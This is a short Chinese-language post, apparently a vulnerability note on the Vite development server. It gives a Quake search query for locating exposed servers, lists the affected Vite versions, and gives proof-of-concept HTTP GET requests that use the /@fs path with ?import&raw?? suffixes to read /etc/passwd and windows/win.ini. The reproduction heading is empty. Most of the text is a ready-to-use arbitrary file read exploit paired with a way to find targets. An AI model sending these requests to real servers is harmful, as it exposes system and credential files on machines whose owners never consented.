quake语法
response:"/@vite/client"
影响范围
6.2.0 <= version <=6.2.2
6.1.0 <= version <=6.1.1
6.0.0 <= version <=6.0.11
5.0.0 <= version <=5.4.14
version <=4.5.9
poc
GET /etc/passwd?raw HTTP/1.1
GET /@fs/C://windows/win.ini?import&raw?? HTTP/1.1
GET /@fs/etc/passwd?import&raw?? HTTP/1.1
复现
评论 (0)
还没有评论,来抢沙发吧。
发表评论